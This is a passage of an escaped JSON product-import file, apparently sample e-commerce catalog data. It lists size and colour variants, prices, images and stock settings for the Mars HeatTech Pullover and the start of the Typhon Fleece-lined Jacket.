ail\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj10-red_alt1.jpg,\\/m\\/j\\/mj10-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"313\":{\"sku\":\"MJ10-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Mars HeatTech&trade; Pullover-L-Black\",\"description\":\"<p>The Mars HeatTech&trade; Jacket defense against winter climes so you can play offense in the park, on the trail or in the deck chair. Great for the ski lodge or stadium, it features a wind- and water-resistant outer shell with a draw-cord hood and deep pockets for storage.<\\/p>\\n<p>&bull; Red 1\\/4 zip pullover.<br \\/>&bull; Adjustable VELCRO&reg; sleeve cuffs. <br \\/>&bull; Two hand pockets. <br \\/>&bull; Napoleon pocket. <br \\/>&bull; Machine wash\\/dry<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mars-heattech-trade-pullover-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"314\":{\"sku\":\"MJ10-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Mars HeatTech&trade; Pullover-L-Orange\",\"description\":\"<p>The Mars HeatTech&trade; Jacket defense against winter climes so you can play offense in the park, on the trail or in the deck chair. Great for the ski lodge or stadium, it features a wind- and water-resistant outer shell with a draw-cord hood and deep pockets for storage.<\\/p>\\n<p>&bull; Red 1\\/4 zip pullover.<br \\/>&bull; Adjustable VELCRO&reg; sleeve cuffs. <br \\/>&bull; Two hand pockets. <br \\/>&bull; Napoleon pocket. <br \\/>&bull; Machine wash\\/dry<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mars-heattech-trade-pullover-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj10-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj10-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj10-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj10-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj10-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"315\":{\"sku\":\"MJ10-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Mars HeatTech&trade; Pullover-L-Red\",\"description\":\"<p>The Mars HeatTech&trade; Jacket defense against winter climes so you can play offense in the park, on the trail or in the deck chair. Great for the ski lodge or stadium, it features a wind- and water-resistant outer shell with a draw-cord hood and deep pockets for storage.<\\/p>\\n<p>&bull; Red 1\\/4 zip pullover.<br \\/>&bull; Adjustable VELCRO&reg; sleeve cuffs. <br \\/>&bull; Two hand pockets. <br \\/>&bull; Napoleon pocket. <br \\/>&bull; Machine wash\\/dry<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mars-heattech-trade-pullover-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj10-red_alt1.jpg,\\/m\\/j\\/mj10-red_back.jpg\",\"image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj10-red_alt1.jpg,\\/m\\/j\\/mj10-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"316\":{\"sku\":\"MJ10-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Mars HeatTech&trade; Pullover-XL-Black\",\"description\":\"<p>The Mars HeatTech&trade; Jacket defense against winter climes so you can play offense in the park, on the trail or in the deck chair. Great for the ski lodge or stadium, it features a wind- and water-resistant outer shell with a draw-cord hood and deep pockets for storage.<\\/p>\\n<p>&bull; Red 1\\/4 zip pullover.<br \\/>&bull; Adjustable VELCRO&reg; sleeve cuffs. <br \\/>&bull; Two hand pockets. <br \\/>&bull; Napoleon pocket. <br \\/>&bull; Machine wash\\/dry<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mars-heattech-trade-pullover-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"317\":{\"sku\":\"MJ10-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Mars HeatTech&trade; Pullover-XL-Orange\",\"description\":\"<p>The Mars HeatTech&trade; Jacket defense against winter climes so you can play offense in the park, on the trail or in the deck chair. Great for the ski lodge or stadium, it features a wind- and water-resistant outer shell with a draw-cord hood and deep pockets for storage.<\\/p>\\n<p>&bull; Red 1\\/4 zip pullover.<br \\/>&bull; Adjustable VELCRO&reg; sleeve cuffs. <br \\/>&bull; Two hand pockets. <br \\/>&bull; Napoleon pocket. <br \\/>&bull; Machine wash\\/dry<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mars-heattech-trade-pullover-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj10-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj10-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj10-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj10-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj10-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"318\":{\"sku\":\"MJ10-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Mars HeatTech&trade; Pullover-XL-Red\",\"description\":\"<p>The Mars HeatTech&trade; Jacket defense against winter climes so you can play offense in the park, on the trail or in the deck chair. Great for the ski lodge or stadium, it features a wind- and water-resistant outer shell with a draw-cord hood and deep pockets for storage.<\\/p>\\n<p>&bull; Red 1\\/4 zip pullover.<br \\/>&bull; Adjustable VELCRO&reg; sleeve cuffs. <br \\/>&bull; Two hand pockets. <br \\/>&bull; Napoleon pocket. <br \\/>&bull; Machine wash\\/dry<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mars-heattech-trade-pullover-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj10-red_alt1.jpg,\\/m\\/j\\/mj10-red_back.jpg\",\"image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj10-red_alt1.jpg,\\/m\\/j\\/mj10-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"319\":{\"sku\":\"MJ10\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Mars HeatTech&trade; Pullover\",\"description\":\"<p>The Mars HeatTech&trade; Jacket defense against winter climes so you can play offense in the park, on the trail or in the deck chair. Great for the ski lodge or stadium, it features a wind- and water-resistant outer shell with a draw-cord hood and deep pockets for storage.<\\/p>\\n<p>&bull; Red 1\\/4 zip pullover.<br \\/>&bull; Adjustable VELCRO&reg; sleeve cuffs. <br \\/>&bull; Two hand pockets. <br \\/>&bull; Napoleon pocket. <br \\/>&bull; Machine wash\\/dry<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Lightweight|Rain Coat|Hard Shell|Windbreaker|&frac14; zip,material=Nylon|Polyester,pattern=Solid,climate=All-weather|Cool|Mild|Rainy|Spring|Windy,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MJ10-XS-Black,size=XS,color=Black|sku=MJ10-XS-Orange,size=XS,color=Orange|sku=MJ10-XS-Red,size=XS,color=Red|sku=MJ10-S-Black,size=S,color=Black|sku=MJ10-S-Orange,size=S,color=Orange|sku=MJ10-S-Red,size=S,color=Red|sku=MJ10-M-Black,size=M,color=Black|sku=MJ10-M-Orange,size=M,color=Orange|sku=MJ10-M-Red,size=M,color=Red|sku=MJ10-L-Black,size=L,color=Black|sku=MJ10-L-Orange,size=L,color=Orange|sku=MJ10-L-Red,size=L,color=Red|sku=MJ10-XL-Black,size=XL,color=Black|sku=MJ10-XL-Orange,size=XL,color=Orange|sku=MJ10-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj10-red_alt1.jpg,\\/m\\/j\\/mj10-red_back.jpg\",\"image\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj10-red_alt1.jpg,\\/m\\/j\\/mj10-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Lightweight|Rain Coat|Hard Shell|Windbreaker|&frac14; zip\",\"material\":\"Nylon|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Mild|Rainy|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"320\":{\"sku\":\"MJ11-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-XS-Black\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"321\":{\"sku\":\"MJ11-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-XS-Green\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance 